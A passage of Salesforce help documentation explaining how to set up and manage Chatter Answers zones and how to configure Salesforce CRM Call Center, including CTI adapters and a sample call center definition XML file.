a. From Setup, click Customize > Tab Names and Labels > Rename Tabs and Labels.
b. Click Edit next to Questions.
c. Click Next.
d. In Other Labels, rename Q&A. You can only rename it as Singular, not Plural.
e. Click Save.

See Also:
Adding Chatter Answers to a Portal

Adding a Custom Visualforce Page to a Portal

Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

User Permissions Needed

“Customize Application”To set up and update the Customer Portal:

To add a custom Visualforce tab to a portal:

1. From Setup, click Create > Tabs to display a list of your organization’s Visualforce tabs.
2. Click New to create a new Visualforce tab.
3. Select the Visualforce page and add details for the other fields on the page.
4. Click Next.
5. Select which user profiles can see the tab.
6. Select the portals that will include the new tab.

See Also:
Customizing Chatter Answers in Portals using Visualforce Pages
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Troubleshooting Chatter Answers Setup

Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

User Permissions Needed

“View Setup and Configuration”To view Setup:

“Customize Application”To set up Chatter Answers:

After you set up a Chatter Answers community, you can view a snapshot of all of its configurations on one page so that you
don’t have to visit several pages in setup to diagnose issues.

1. From Setup, click Customize > Chatter Answers > Sites Settings.
2. In the Site Snapshot column, click View next to the Force.com site associated with your community.

3. Click  to show or  to hide various settings.
4. Click Go! to go to a specific page in setup where you can change settings.

For example, you can use a site snapshot to see if the Force.com site hosting your community is marked Active or to verify
the names of the user profiles assigned to your Customer Portal.

See Also:
Chatter Answers Implementation Overview
Chatter Answers Users Overview
Setting Up Chatter Answers

Chatter Answers Users Overview
Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

Because Chatter Answers integrates several features with the Customer Portal, managing Chatter Answers users is similar to
managing Customer Portal users. Use the following to manage the data and functions that are accessible to Chatter Answers
users:

• Profiles, permissions, and access settings determine a user’s permission to perform different functions, such as adding
comments to a case.

• User licenses define which profiles and permission sets are available to a user, such as the High Volume Customer Portal
(Service Cloud Portal User) or Customer Portal Manager Custom license.

• Feature licenses entitle a user to additional Salesforce features, such as Chatter Answers.

• Field-level security defines which fields users can access, such as fields on Salesforce Knowledge articles.

• Sharing sets let you selectively grant record access to defined groups of high-volume portal users.

Chatter Answers excludes some features typically available to Customer Portal users, such as:
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• Ideas

• Groups

• Teams

• Reports

• Content

• Page layouts

• Custom objects

• Delegated external user administration

• Customer Portal role hierarchy (available, but not used)

• Customer Portal sharing rules, except for high-volume portal users

Chatter Answers users can only access the following records from your zone:

• Cases

• Questions

• Replies (answers)

• Salesforce Knowledge articles

Chatter Answers is designed to support one user language for each zone that you create. When you enable Chatter Answers,
the Visualforce pages automatically added to your organization inherit your organization’s default language. However, you
can change the language attribute on each Visualforce page. Users who self-register for your zone inherit your organization’s
default language. Guest users view your zone in the language specified in the Visualforce pages, no matter the language chosen
for their browsers.

Note:

• Chatter Answers users can’t change their language, timezone, or locale settings.

• Portal users must have the Chatter Answers User feature license to use Chatter Answers. This feature license is
automatically assigned to high-volume portal users who self-register forChatter Answers. You can manually assign
the license to users who don’t self-register by editing a user and clicking Chatter Answers User.

See Also:
Setting Up Chatter Answers

Encouraging Participation with Chatter Answers Reputation

Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

Tap into the expertise and knowledge of your most active zone members by rewarding their activity. By enabling reputations,
you let users earn points and ratings that display in hover details over a user’s photo in the feed. As your star posters engage
more frequently, they improve the overall content in your zone and provide better answers for users who are searching for help
with an issue. This means that users who are searching for a solution can be confident that an answer from an expert can be
trusted, which means fewer support calls for your organization.
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Users earn points when their posts receive votes or are selected as a best answer in any of the zones to which they belong.
When they earn enough points, the hover details show their reputation as well as the number of posts and best answers they
have in that zone. Reputation points are calculated separately for each zone. For example, a user who is a member of different
zones will have different reputation values in each zone based on his or her activity in that zone.

Chatter Answers comes with the following pre-defined reputation levels that apply to all zones:

ColorPoints per LevelName

Green0 – 499Newbie

Blue500 – 1999Smartie

Purple2000 – 4999Pro

Orange5000+All Star

To add or edit reputation level names or points per level in any of your zones, use the ChatterAnswersReputationLevel object
in the API. You can create up to 25 different reputation levels for each zone. Colors for the different reputation levels can be
changed at the stylesheet (CSS) level.

See Also:
Chatter Answers Users Overview

Chatter Answers Implementation Tips
Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

Consider the following information when planning and implementing Chatter Answers.
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• We recommend that advanced Salesforce administrators and developers set up and maintain Chatter Answers, as it involves
several Salesforce features.

• Before administrators can set up Chatter Answers, their organizations must have implemented Data Categories. If you
want Salesforce Knowledge articles to display in your zones, then administrators need to implement Salesforce Knowledge.

• You can customize fields, page layouts, buttons and links, Apex triggers, and validation rules for questions and replies for
Chatter Answers from Setup by clicking Customize > Chatter Answers and choosing the appropriate setting.

• After you enable Chatter Answers, several items are automatically added to your organization for use with setting up zones:

◊ A Q&A tab where internal users and administrators can view and use Chatter Answers. Administrators can rename
this tab.

◊ Standard permission settings for Questions on user profiles so that you can grant users permissions to questions and
replies.

◊ Visualforce pages that you add to a Force.com site so that users can register, sign in, and view feed items on a zone.

◊ An Apex trigger for questions named chatter_answers_question_escalation_to_case_trigger so that
questions with specified attributes are automatically escalated to cases.

◊ A workflow field update named chatter_answers_num_subscriptions_above_ so that when a question is
escalated to a case, Priority on questions is updated.

◊ Two workflow rules, chatter_answers_no_best_reply_within_time_limit_wf and
chatter_answers_num_subscriptions_above_limit_wf, which you can customize and activate so that
questions without best replies or questions with a specified number of followers are automatically escalated to cases.

• You can add Chatter Answers to an existing Customer Portal or Partner Portal so that portal users can access Chatter
Answers zones from one of your established channels.

• Chatter Answers is designed to support one user language for each zone that you create. When you enable Chatter Answers,
the Visualforce pages automatically added to your organization inherit your organization’s default language. However, you
can change the language attribute on each Visualforce page. Users who self-register for your zone inherit your organization’s
default language. Guest users view your zone in the language specified in the Visualforce pages, no matter the language
chosen for their browsers.

• You can rename Customer Support on your zones’ user interface. For example, you can change “Customer Support”
to “Acme Support.” Just edit the Customer Support label on the Question object.

• Questions escalated to cases display a Chatter-like feed on case detail pages. The case detail page also includes a Customer
View section that lets support agents reply publicly or privately to the thread posted to the zone.

• Case comments marked Public display as private messages from customer support in Chatter Answers; they don't display
to the entire community. For example, if a support agent adds a public case comment, it only displays to the case's contact
when he or she logs in to Chatter Answers to review private messages. Support agents can read all private and public case
comments. .

• Chatter Answers sends email to users when they:

◊ Sign up for an account.

◊ Follow a question (answers or comments).

◊ Receive an answer or comment to their question.

◊ Receive a private reply to their question from customer support.

• Internet Explorer 8 users receive a security warning if you customize with URLs that don't include https://.

• Before you make a zone public, add at least 20 frequently asked questions, answers, or articles. This content will generate
conversations.

• Create Salesforce Knowledge articles that contain:

◊ Your support organization's phone number so that customers can contact your support agents directly.
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◊ Terms and conditions for zone members, such as when support agents might delete customers' questions and comments.

• Chatter Answers uses the following API objects:

◊ Case

◊ ChatterAnswersActivity

◊ ChatterAnswersReputationLevel

◊ Community (Zone)

◊ Question

◊ QuestionReportAbuse

◊ QuestionSubscription

◊ Reply

◊ ReplyReportAbuse

See Also:
Chatter Answers Best Practices
Setting Up Chatter Answers

Chatter Answers Best Practices
Consider the following tips when planning and using Chatter Answers.

• We recommend that you tell support agents that:

◊ The Case Origin field lists Chatter Answers on any case converted from a question.

◊ If they answer a question privately, they can't convert it to a public answer.

• We recommend that you assign a support agent to review public questions from the Questions tab. Agents can’t click Flag
next to questions or replies that are spam, hateful, or inappropriate, but they can edit and delete questions or replies from
a Web community via the Questions tab if they have the “Delete” permission on questions.

• To moderate many questions quickly, we recommend that support agents review questions from pinned lists on the Service
Cloud console (this requires adding the Questions tab to the console’s Navigation tab; see Creating a Service Cloud Console
App on page 2115).

• To see a list of cases converted from questions, we recommend that administrators or support agents create a case view
where Case Origin equals Chatter Answers.

• Because photos added to profiles display externally on Chatter Answers, we recommend that support agents choose photos
that match their company's policies and branding.

See Also:
Chatter Answers Implementation Tips
Setting Up Chatter Answers
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CREATING PHONE CHANNELS

Salesforce Open CTI Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Salesforce CRM Call Center seamlessly integrates Salesforce with third-party computer-telephony integration (CTI) systems.
Before the introduction of Open CTI, Salesforce users could only use the features of a CTI system after they installed a CTI
adapter program on their machines. Yet such programs often included desktop software that required maintenance and didn’t
get the benefits of cloud architecture. Open CTI lets developers:

• Build CTI systems that integrate with Salesforce without the use of CTI adapters.

• Create customizable SoftPhones (call-control tools) that function as fully integrated parts of Salesforce and the Service
Cloud console.

• Provide users with CTI systems that are browser and platform agnostic, for example, CTI for Microsoft® Internet Explorer®,
Mozilla® Firefox®, Apple® Safari®, or Google Chrome™ on Mac, Linux, or Windows machines.

Developers use Open CTI in JavaScript to embed API calls and processes; Open CTI is only available for use with JavaScript
pages. To use Open CTI, developers should have a basic familiarity with:

• CTI

• JavaScript

• Visualforce

• Web services

• Software development

• The Service Cloud console

• Salesforce CRM Call Center

For information (English only) on customizing and building CTI systems with Open CTI, see the Open CTI Developer’s
Guide.

See Also:
Call Center Overview
Salesforce Open CTI Supported Browsers
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Salesforce Open CTI Supported Browsers

Available in: Professional, Enterprise, Unlimited, and Developer Editions

The minimum browser requirements for Open CTI are Microsoft® Internet Explorer® 8; Mozilla® Firefox® 3.6; Apple® Safari®

4; Google Chrome™ 11.0.

See Also:
Salesforce Open CTI Overview

Salesforce CTI Toolkit Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Developers use a CTI (computer-telephony integration) toolkit provided by salesforce.com to build CTI adapters that integrate
Salesforce with third-party CTI systems. The CTI Toolkit helps developers build CTI adapters that Salesforce CRM Call
Center users install on their machines so they can use the features of a CTI system through the Salesforce SoftPhone.

There are three versions of the CTI Toolkit. Each version provides users with different Salesforce CRM Call Center
functionality. However, salesforce.com only distributes CTI Toolkit version 4.0 or higher. The following table lists the
functionality available in CTI adapters built with each CTI Toolkit:

Version 4.0 or HigherVersion 3.0 or HigherVersion 2.0 or HigherVersion 1.0 or HigherFunctionality

Change the fields and
order of fields that
display in a SoftPhone

Change the objects and
order of links to objects
that display in a
SoftPhone

Specify the fields that
display in the
SoftPhone if a single
record for a particular
object is found

Specify screen pop
settings for inbound
calls with single,
multiple, or no record
matches
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Version 4.0 or HigherVersion 3.0 or HigherVersion 2.0 or HigherVersion 1.0 or HigherFunctionality

Specify screen pops for
inbound calls to display
in browser windows
that are already open, or
in new browser
windows or tabs

Specify screen pops to
Visualforce pages for
inbound calls

Specify screen pops to
search pages for
inbound calls with
multiple record matches

View a call center's
version in a Version
field (from Setup, click
Customize > Call
Center > Call Centers
and choose a call center)

View an enhanced
SoftPhone
user-interface in the
footer of the Service
Cloud console

Log calls in the
customizable interaction
log of the Service Cloud
console

Support browsers that
are cross-domain
messaging compatible

Reduce CTI adapter
size and complexity

For information (English only) on customizing and building CTI adapters, see:

• CTI Toolkit Developer's Guide (Version 4.0)

• CTI Toolkit Developer's Guide (Versions 1.0 to 3.0)
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Partners and developers can download the CTI Toolkit by visiting developer.force.com. The CTI Toolkit provides you with
all of the source code, libraries, and files you need to develop your own custom CTI adapter.

See Also:
Call Center Overview
Designing a Custom SoftPhone Layout

Call Center Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Salesforce CRM Call Center seamlessly integrates Salesforce with third-party computer-telephony integration (CTI) systems.
After a lightweight CTI adapter program has been installed on a Salesforce user's machine, the user can use the features of a
CTI system through the Salesforce SoftPhone, a customizable call-control tool that appears in the footer of the Service Cloud
console or in sidebar of every Salesforce page.

The SoftPhone allows Salesforce users to:

• Make calls by dialing a number in the SoftPhone, choosing a number in an online directory, or clicking a phone number
in any contact, lead, activity, or account

• Receive calls

• Quickly view all Salesforce records that are related to the call, such as contacts, cases, or accounts

• Transfer calls

• Initiate conference calls

• Put callers on hold

• Attach records to calls

• Generate automatic call logs

Administrators can configure Salesforce CRM Call Center by:

• Modifying SoftPhone layouts and assigning them to selected user profiles

• Adding phone numbers to call center directories

Developers can use Salesforce CRM Call Center code libraries to:

• Customize the functionality of existing CTI adapters

• Build new CTI adapters for phone systems that are not yet supported

For information on:

• Working with Salesforce CRM Call Center as a call center user, see Using the SoftPhone on page 1722 and Using a SoftPhone
with a Service Cloud Console on page 1902

• Deploying and customizing Salesforce CRM Call Center as an administrator, see Setting Up Salesforce CRM Call Center
on page 2065

• Customizing and building CTI adapters as a developer, see the CTI Toolkit Developer's Guide

• Building cloud-based CTI systems as a developer, see Salesforce Open CTI Overview on page 2061
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.

Note:  Some Salesforce CRM Call Center features that are described in this help system might not be available with
your SoftPhone because of customizations that have been made for your organization or the CTI Toolkit with which
your SoftPhone was built. See your administrator for details.

See Also:
Deploying Adapters to Call Center Machines
Salesforce CTI Toolkit Overview
Tip sheet: Getting Started with your SoftPhone
Administrator tip sheet: Getting Started with Setting Up Call Centers
Developer guide: CTI Toolkit Developer's Guide

Setting Up Salesforce CRM Call Center
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Call Centers”To manage call centers, call center users, call center directories,
and SoftPhone layouts:

Before Salesforce users can access Salesforce CRM Call Center features, an administrator must perform the following tasks:

1. Install a computer-telephony integration (CTI) adapter on every call center user machine. Salesforce CRM Call Center
features are not available on machines that do not have an adapter installed.

2. Define a new call center record for every CTI system in use at your organization.
3. Assign Salesforce users to the appropriate call center. A Salesforce CRM Call Center user must be associated with a call

center to view the SoftPhone user interface.
4. Optionally:

• Configure call center phone directories with additional directory numbers and updated phone number search layouts.
• Customize SoftPhone layouts for different user profiles, so that the SoftPhone of a salesperson might show related

leads, accounts, and opportunities, while the SoftPhone of a support rep might show related cases and solutions.
• If you're using CTI adapters built with version 4.0 of the CTI Toolkit, enable HTTPS for your call center.

See Also:
Administrator tip sheet: Getting Started with Setting Up Call Centers
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Deploying Adapters to Call Center Machines

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Except for call centers built with Open CTI, any machine that uses Salesforce CRM Call Center must have a CTI adapter
installed. A CTI adapter is a light-weight software program that controls the appearance and behavior of a Salesforce SoftPhone.
The CTI Developer's Toolkit version determines a SoftPhone's functionality.

Because a CTI adapter communicates directly with an individual CTI system, an organization must use a different CTI adapter
for each type of CTI system that is in use. For example, if an organization wants to integrate one call center that runs Cisco
IPCC Enterprise™ and one call center that runs Cisco IPCC Express™, the organization must have two CTI adapters available.
A call center user's machine only requires the SoftPhone CTI adapter for the call center to which it connects.

To download a SoftPhone CTI adapter, visit AppExchange. Adapter installation packages include both the adapter setup
files and a call center definition file that can be used in conjunction with the adapter.

To install a CTI adapter on a single machine, run the CTI adapter's Setup.exe application as a Windows administrator
user.

To deploy a CTI adapter to all the machines in a call center at once, use the .msi file that is packaged with the installer and
your preferred Software Management System.

Once a CTI adapter is installed, you can perform the following operations:

• Start the CTI adapter application by clicking Start > Programs > salesforce.com > <Your CTI System Name> Adapter.
You can verify that the CTI adapter is running by looking for the  icon in the system tray of the computer.

• Stop the CTI adapter application by right-clicking the CTI adapter system tray icon ( ) and choosing Exit.
• Modify CTI adapter log settings by right-clicking the CTI adapter system tray icon ( ) and choosing Logging.... In the

CTI Log Settings dialog:

◊ Select the types of messages that you want to log. Keep log levels at Low - Errors unless you are troubleshooting an
issue with your adapter.

◊ Specify the location for the two log files that the CTI adapter generates. For more information on these files, see the
CTI Toolkit Developer's Guide.

See Also:
Setting Up Salesforce CRM Call Center
Managing Call Center Users
Administrator tip sheet: Getting Started with Setting Up Call Centers
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Call Center Definition Files

Available in: Professional, Enterprise, Unlimited, and Developer Editions

A call center definition file specifies a set of fields and values that are used to define a call center in Salesforce for a particular
CTI adapter. Salesforce uses call center definition files in order to support the integration of Salesforce CRM Call Center
with multiple CTI system vendors.

By default, any CTI adapter installation package includes a default call center definition file that works specifically with that
adapter. This XML file is located in the adapter installation directory and is named after the CTI system that it supports. For
example, the Cisco IPCC Enterprise™ adapter's default call center definition file is named CiscoIPCCEnterprise7x.xml.

The first instance of a call center for a particular CTI adapter must be defined by importing the adapter's call center definition
file into Salesforce. Subsequent call centers can be created by cloning the original call center that was created with the import.

If your organization modifies an adapter or builds a new one, you must customize the adapter's call center definition file so
that it includes any additional call center information that is required. For example, if you are building a CTI adapter for a
system that supports a backup server, your call center definition file should include fields for the backup server's IP address
and port number. CTI adapters for systems that do not make use of a backup server do not need those fields in their associated
call center definition files.

Note:  Once a call center definition file has been imported into Salesforce, the set of fields that were specified in the
file cannot be modified. The values assigned to those fields, however, can be changed within Salesforce.

See the following topics for information about creating and importing a call center definition file:

• To create a call center definition file for a custom CTI adapter, see Creating a Call Center Definition File on page 2067.

• To view a sample call center definition file, see Sample Call Center Definition File on page 2068.

• To import a call center definition file into Salesforce, see Importing a Call Center Definition File on page 2069.

See Also:
Creating a Call Center
Cloning a Call Center
Call Center Definition XML Format
Required Call Center Elements and Attributes
Specifying Values for <item> Elements
Administrator tip sheet: Getting Started with Setting Up Call Centers

Creating a Call Center Definition File

Available in: Professional, Enterprise, Unlimited, and Developer Editions

If you have built a custom CTI adapter you must write a call center definition file to support it. Use a text or XML editor to
define an XML file according to the guidelines outlined in the following topics:
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• Call Center Definition XML Format

• Required Call Center Elements and Attributes

• Specifying Values for <item> Elements

• Sample Call Center Definition File

See Also:
Creating a Call Center
Sample Call Center Definition File
Importing a Call Center Definition File
Cloning a Call Center
Administrator tip sheet: Getting Started with Setting Up Call Centers

Sample Call Center Definition File

Available in: Professional, Enterprise, Unlimited, and Developer Editions

The following XML code makes up a sample call center definition file. For more information on the XML format of a call
center definition file, see Creating a Call Center Definition File on page 2067.

<!--
All sections and items whose name value begins with "req" are
required in a valid call center definition file. The sortOrder
and label attributes can be changed for all required sections
and items except reqGeneralInfo, reqInternalName, and
reqDisplayName, in which only the label attribute can be altered.

Note that the value for the reqInternalName item is limited to
40 alphanumeric characters and must start with an alphabetic
character. reqInternalName must be unique for all call centers
that you define.

-->

<callCenter>

<section sortOrder="0" name="reqGeneralInfo" label="General Info">
<item sortOrder="0" name="reqInternalName"

label="Internal Name">callCenter001</item>
<item sortOrder="1" name="reqDisplayName"

label="Display Name">My Call Center</item>
<item sortOrder="2" name="reqDescription"

label="Description">Located in San Francisco, CA</item>
<item sortOrder="3" name="reqProgId"

label="CTI Connector ProgId">MyAdapter.MyAdapter.1</item>
<item sortOrder="4" name="reqVersion"

label="Version">4.0</item>
<item sortOrder="5" name="reqAdapterUrl"

label="CTI Adapter URL">http://localhost:11000</item>
</section>

<section sortOrder="1" name="ServerInfo" label="CTI Server Info">
<item sortOrder="0" name="HostA"

label="Host A">Host A</item>
<item sortOrder="1" name="PortA"

label="Port A">Port A</item>
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<item sortOrder="2" name="HostB"
label="Host B">Host B</item>

<item sortOrder="3" name="PortB"
label="Port B">Port B</item>

<item sortOrder="4" name="PeripheralID"
label="Peripheral ID">1000</item>

</section>

<section sortOrder="2" name="DialingOptions" label="Dialing Options">
<item sortOrder="0" name="OutsidePrefix"

label="Outside Prefix">1</item>
<item sortOrder="1" name="LongDistPrefix"

label="Long Distance Prefix">9</item>
<item sortOrder="2" name="InternationalPrefix"

label="International Prefix">01</item>
</section>

</callCenter>

See Also:
Creating a Call Center
Creating a Call Center Definition File
Call Center Definition XML Format
Required Call Center Elements and Attributes
Specifying Values for <item> Elements

Importing a Call Center Definition File

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”

AND

“Manage Call Centers”

To import call center definition files:

To create your first call center for a CTI adapter that was just installed, you can import the adapter's default call center definition
file into Salesforce:

1. From Setup, click Customize > Call Center > Call Centers.
2. Click Import.
3. Next to the Call Center Definition File field, click Browse to navigate to the default call center definition file

in your CTI adapter installation directory. This XML file is named after the type of CTI system that the adapter supports.
For example, the Cisco™ IPCC Enterprise adapter's default call center definition file is named
CiscoIPCCEnterprise7x.xml. Click Open to enter the path in the Call Center Definition File field.

4. Click Import to import the file and return to the All Call Centers page. The new call center record is listed with the other
call centers in your organization.
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Note:  If you receive the error A call center with this internal name already exists, a
call center definition file for this CTI adapter has already been imported into Salesforce. To create additional call
center records for this CTI adapter, clone the adapter's existing call center, or modify the call center definition
file to include a different value for reqInternalName.

5. Click Edit next to the name of the new call center to modify the call center's settings.

To create additional call centers for a particular CTI adapter, see Cloning a Call Center on page 2075.

To define a new call center definition file for a CTI adapter that was customized specifically for your organization, see Creating
a Call Center Definition File on page 2067.

See Also:
Creating a Call Center
Managing Call Centers
Administrator tip sheet: Getting Started with Setting Up Call Centers

Call Center Definition XML Format

Available in: Professional, Enterprise, Unlimited, and Developer Editions

A call center definition file consists of three XML elements: callCenter, section, and item. The following list provides
details about the properties and attributes of each element:

callCenter

This element represents a definition for a single call center phone system. At least one <callCenter> element must
be included in every call center definition file. A <callCenter> element consists of one or more <section> elements.

section

This element represents a grouping of related data fields, such as server information or dialing prefixes. When a call
center is edited in Salesforce, fields are organized by the section to which they are assigned. A <section> element
belongs to a single <callCenter> element, and consists of one or more <item> elements.

Attributes:

DescriptionRequired?TypeName

The order in which the section should appear when the call
center is edited in Salesforce. For example, a section with

RequiredPositive IntegersortOrder

sortOrder="1" comes just before a section with
sortOrder="2".

The values for sortOrder must be non-negative integers,
and no numbers can be skipped within a single call center
definition. For example, if there are three section elements in
a call center definition file, one <section> element must
have sortOrder="0", one <section> element must have
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DescriptionRequired?TypeName

sortOrder="1", and one <section> element must have
sortOrder="2".

The internal name of the section as defined in the Salesforce
database. You can use this value to refer to the section when
writing custom adapter or SoftPhone code.

Names must be composed of only alphanumeric characters
with no white space or other punctuation. They are limited
to 40 characters each.

RequiredStringname

Names beginning with req are reserved for required Salesforce
sections only (see Required Call Center Elements and
Attributes on page 2072). Other reserved words that cannot be
used for the name attribute include label, sortOrder,
internalNameLabel, and displayNameLabel.

The name of the section when viewed in Salesforce. Labels
can be composed of any string of UTF-8 characters. They are
limited to 1000 characters each.

OptionalStringlabel

item

This element represents a single field in a call center definition, such as the IP address of a primary server or the dialing
prefix for international calls. When call centers are edited in Salesforce, each <item> element is listed under the section
to which it belongs. You can have multiple <item> elements in a <section> element.

Attributes:

DescriptionRequired?TypeName

The order in which the item should appear when the call
center is edited in Salesforce. For example, an item with

RequiredPositive IntegersortOrder

sortOrder="1" comes just before an item with
sortOrder="2".

The values for sortOrder must be non-negative integers,
and no numbers can be skipped within a single call center
definition. For example, if there are three item elements in a
call center definition file, one <item> element must have
sortOrder="0", one <item> element must have
sortOrder="1", and one <item> element must have
sortOrder="2".
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DescriptionRequired?TypeName

The internal name of the item as defined in the Salesforce
database. You can use this value to refer to the item when
writing custom adapter or SoftPhone code.

Names must be composed of only alphanumeric characters
with no white space or other punctuation. They are limited
to 40 characters each.

RequiredStringname

Names beginning with req are reserved for required Salesforce
sections only (see Required Call Center Elements and
Attributes on page 2072). Other reserved words that cannot be
used for the name attribute include label, sortOrder,
internalNameLabel, and displayNameLabel.

The name of the item when viewed in Salesforce. Labels can
be composed of any string of UTF-8 characters. They are
limited to 1,000 characters each.

OptionalStringlabel

See Also:
Creating a Call Center
Call Center Definition XML Format
Creating a Call Center Definition File
Required Call Center Elements and Attributes
Specifying Values for <item> Elements
Sample Call Center Definition File

Required Call Center Elements and Attributes

Available in: Professional, Enterprise, Unlimited, and Developer Editions

There must be one <section> that includes <item> elements with the following names in every call center definition file:

Description<item> Name

Represents the unique identifier for the call center in the database. It must have
a sortOrder value of 0, and its value must be specified in the call center definition

reqInternalName

(see Specifying Values for <item> Elements on page 2073). A value for
reqInternalName must be composed of no more than 40 alphanumeric
characters with no white space or other punctuation. It must start with an alphabetic
character and must be unique from the reqInternalName of all other call centers
defined in your organization.
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Description<item> Name

Represents the name of the call center as displayed in Salesforce. It must have a
sortOrder value of 1. A value for reqDisplayName has a maximum length of
1,000 UTF-8 characters.

reqDisplayName

Represents a description of the call center. A value for reqDescription has a
maximum length of 1,000 UTF-8 characters.

reqDescription

Represents the Program ID (progId) of the CTI adapter that should be used for
this call center. This value is specified in the default call center definition file that

reqProgId

comes bundled with every CTI adapter installer, or in the base COM class of a
custom CTI adapter.

Represents the version of the CTI Toolkit with which the adapter was built. This
element is available for call centers built with CTI Toolkit versions 3.0 or higher.

reqVersion

Represents the location of where the CTI adapter is hosted. For example,
http://localhost:11000. This element is available for call centers built with
CTI Toolkit versions 4.0 or higher.

reqAdapterUrl

You can add additional <item> elements to this section if needed.

See Also:
Creating a Call Center
Creating a Call Center Definition File
Call Center Definition XML Format
Required Call Center Elements and Attributes
Specifying Values for <item> Elements
Sample Call Center Definition File

Specifying Values for <item> Elements

Available in: Professional, Enterprise, Unlimited, and Developer Editions

With the exception of the reqInternalName <item>, whose value must always be specified in a call center definition file,
you can specify <item> values either in the call center definition file or in Salesforce once the definition file has been imported.

To specify a value for an <item> element in a call center definition file, place the value between the opening and closing tags
of the <item>. For example:

<item sortOrder="0" name="reqInternalName" label="Call Center Internal
Label">MyCallCenter</item>
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sets the value of the reqInternalName <item> to MyCallCenter. Note that any <item> value other than the value for
reqInternalName can be edited in Salesforce after the call center definition is imported.

See Also:
Creating a Call Center
Call Center Definition XML Format
Creating a Call Center Definition File
Required Call Center Elements and Attributes
Sample Call Center Definition File

Creating a Call Center
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Call Centers”To create a call center by importing or cloning:

A call center in Salesforce CRM Call Center corresponds to a single computer-telephony integration (CTI) system already
in place at your organization. Salesforce users must be assigned to a call center record before they can use any Salesforce CRM
Call Center features.

There are two ways to create a call center record in Salesforce:

• Import a call center definition file into Salesforce. Use this method to create your first call center for a CTI adapter that
was just installed.

• Clone an existing call center definition. Use this method to create additional call centers for a particular CTI adapter. For
example, if you already have a call center record for a Cisco IPCC Enterprise™ call center based in one location, you can
clone that record for a Cisco IPCC Enterprise call center based in another location.

To view a list of call centers that have already been created, from Setup, click Customize > Call Center > Call Centers.

See Also:
Setting Up Salesforce CRM Call Center
Call Center Definition Files
Managing Call Centers
Displaying and Editing a Call Center
Managing Call Center Users
Administrator tip sheet: Getting Started with Setting Up Call Centers
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Cloning a Call Center

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Call Centers”To view and clone a call center:

To create more than one call center for a particular CTI adapter, you can clone an existing one. For example, if you already
have a call center record for a Cisco IPCC Enterprise™ call center based in one location, you can clone that record for a Cisco
IPCC Enterprise call center based in another location.

To clone a call center:

1. From Setup, click Customize > Call Center > Call Centers.
2. Click the name of the call center that you want to clone.
3. Click Clone. This action opens a new call center for editing with the same fields and values as the original call center.

Only the Internal Name field is left intentionally blank to allow you to provide a new name. The Internal Name
field is limited to 40 alphanumeric characters and must start with an alphabetic character. Internal Name must be unique
for every call center defined in your organization. For more information, see Call Center Fields on page 2077.

4. Make any additional changes to the new call center as necessary.
5. Click Save to save the new call center, or click Cancel to return to the All Call Centers page without saving the cloned

call center.

Note:  If you have read-only access to a field, the value of that field is not carried over to the cloned record.

See Also:
Setting Up Salesforce CRM Call Center
Creating a Call Center
Managing Call Centers
Displaying and Editing a Call Center
Importing a Call Center Definition File
Administrator tip sheet: Getting Started with Setting Up Call Centers
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Displaying and Editing a Call Center

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Call Centers”To view or edit a call center:

A call center in Salesforce CRM Call Center corresponds to a single computer-telephony integration (CTI) system already
in place at your organization. Salesforce users must be assigned to a call center record before they can use any Salesforce CRM
Call Center features.

To view call center details:

1. From Setup, click Customize > Call Center > Call Centers.
2. Click the name of the call center that you want to view.

From the Call Center Detail page you can:

• Click Edit to modify the properties of the call center.

• Click Delete to erase the call center record from Salesforce. When you delete a call center, all associated directory numbers
are also deleted. Any users associated with the call center must be reassigned to another call center to continue using
Salesforce CRM Call Center features .

• Click Clone to create a duplicate copy of the call center with the same fields and values as the current call center.

• Click Manage Call Center Users to designate Salesforce users as members of this call center.

Note:  Some Salesforce CRM Call Center features that are described in this help system might not be available with
your SoftPhone because of customizations that have been made for your organization or the CTI Toolkit with which
your SoftPhone was built. See your administrator for details.

See Also:
Creating a Call Center
Managing Call Centers
Enabling HTTPS in a Call Center
Call Center Definition Files
Administrator tip sheet: Getting Started with Setting Up Call Centers
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Managing Call Centers

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Call Centers”To import, view, edit, or delete a call center:

A call center in Salesforce CRM Call Center corresponds to a single computer-telephony integration (CTI) system already
in place at your organization. Salesforce users must be assigned to a call center record before they can use any Salesforce CRM
Call Center features.

To view a list of call centers that have already been created, from Setup, click Customize > Call Center > Call Centers. From
this page, you can:

• Click the name of a call center to view call center details.

• Click Import to import a call center definition file that you have already created.

• Click Edit next to any call center to modify call center details.

• Click Del next to any call center to erase the call center record from Salesforce. When you delete a call center, all associated
directory numbers are also deleted. Any users associated with the call center must be reassigned to another call center to
continue using Salesforce CRM Call Center features .

See Also:
Setting Up Salesforce CRM Call Center
Creating a Call Center
Call Center Definition Files
Managing Call Center Users
Administrator tip sheet: Getting Started with Setting Up Call Centers

Call Center Fields

Available in: Professional, Enterprise, Unlimited, and Developer Editions

All call centers include the following required fields, though additional fields may be available depending on the content of
the call center definition file that was used to create the call center:

DescriptionField

Represents the unique identifier for the call center in the database. Internal Name must
be composed of no more than 40 alphanumeric characters with no white space or other

Internal Name

punctuation. It must start with an alphabetic character and must be unique from the Internal
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DescriptionField

Name of all other call centers defined in your organization. Once a value for Internal Name
has been saved for a call center, it cannot be changed.

Represents the name of the call center as displayed in Salesforce. It must have a sortOrder
value of 1. Display Name has a maximum length of 1,000 UTF-8 characters.

Display Name

Represents a description of the call center. Description has a maximum length of 1,000
UTF-8 characters.

Description

Represents the Program ID (progId) of the CTI adapter that should be used for this call
center. This value is specified in the default call center definition file that comes bundled with
every CTI adapter installer, or in the base COM class of a custom CTI adapter.

CTI Connector ProgId

See Also:
Displaying and Editing a Call Center
Creating a Call Center
Managing Call Center Users
